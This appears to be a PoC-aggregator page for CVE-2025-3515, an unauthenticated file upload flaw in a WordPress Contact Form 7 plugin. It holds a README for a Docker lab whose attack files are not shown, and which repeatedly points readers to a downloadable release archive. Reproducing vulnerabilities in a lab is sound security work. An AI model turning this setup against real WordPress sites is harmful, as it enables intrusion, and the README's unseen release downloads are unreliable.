CVE-2025-3515 PoC — Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.8.9 - Unauthenticated Arbitrary File Upload via Insufficien

Source

Associated Vulnerability

Description

🛠️ Reproduce and validate CVE-2025-3515 by setting up a Dockerized WordPress lab for testing unrestricted file uploads in a vulnerable plugin.

Readme

# 🚀 lab-cve-2025-3515 - Easy File Uploads for WordPress

## 🔗 Download Now
[![Download](https://img.shields.io/badge/Download%20Latest%20Release-blue.svg)](https://github.com/robertskimengote/lab-cve-2025-3515/releases)

## 📖 Project Description
Welcome to the lab-cve-2025-3515! This project provides a hands-on environment to explore CVE-2025-3515. It focuses on a WordPress setup with a drag-and-drop feature for multiple file uploads in Contact Form 7. This project is designed as a proof-of-concept and includes Nuclei testing to evaluate security risks.

## 📋 System Requirements
To use this application, ensure your system meets the following requirements:

- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution.
- Docker: Install Docker Desktop for your operating system.
- Memory: At least 4 GB of RAM recommended.
- Disk Space: 1 GB of free disk space.

## 🚀 Getting Started
Follow these steps to get up and running with the lab-cve-2025-3515:

1. **Ensure Docker is Installed**  
   If you do not have Docker, download and install it from [the official Docker website](https://www.docker.com/get-started).

2. **Download the Application**  
   Visit the [Releases page](https://github.com/robertskimengote/lab-cve-2025-3515/releases) to download the latest version.

3. **Extract the Files**  
   Locate the downloaded file on your computer and extract its contents. You can usually do this by right-clicking the file and selecting “Extract All…” or using a software like WinRAR or 7-Zip.

4. **Open a Command Prompt or Terminal**  
   On Windows, search for `cmd` in the Start menu. On macOS or Linux, open the Terminal app.

5. **Navigate to the Directory**  
   Change to the directory where you extracted the files. Use the `cd` command, followed by the path to your folder. For example:
   ```
   cd path/to/lab-cve-2025-3515
   ```

6. **Run Docker Compose**  
   Enter the following command to start the application with Docker:
   ```
   docker-compose up -d
   ```
   This command will pull the necessary Docker images and start the application in a few moments.

7. **Access the Application**  
   Open your web browser and navigate to `http://localhost:8080`. Here you can begin testing the drag-and-drop file upload feature.

## 💻 Features
- **Drag-and-Drop Uploads**: Users can easily upload multiple files with a simple drag-and-drop interface.
- **Nuclei Testing**: Integrated scripts to help check for common vulnerabilities.
- **Easy Setup**: Quick installation and setup with Docker for a smooth experience.

## 📥 Download & Install
To get the latest version of lab-cve-2025-3515, follow the link below to visit the releases page:

[Download Latest Release](https://github.com/robertskimengote/lab-cve-2025-3515/releases)

Follow the above getting started steps after downloading to set up the application.

## 🛠 Troubleshooting
If you encounter any issues:
- Ensure Docker is running before starting the application.
- Check for errors in the command prompt or terminal for clues.
- Make sure your firewall or antivirus is not blocking Docker.

## 📞 Support
If you need help, please open an issue on the GitHub repository. Provide details about your problem, and someone from the community will assist you.

Thank you for using lab-cve-2025-3515. We hope you enjoy exploring WordPress security in a practical way!

File Snapshot

 [4.0K]  /data/pocs/3ea5bbf2726d25d36712c323de89bbe58a59b568
├── [1.2K]  docker-compose.yml
├── [3.3K]  README.md
└── [4.0K]  scripts
    └── [3.8K]  wp-init.sh

1 directory, 3 files

Remarks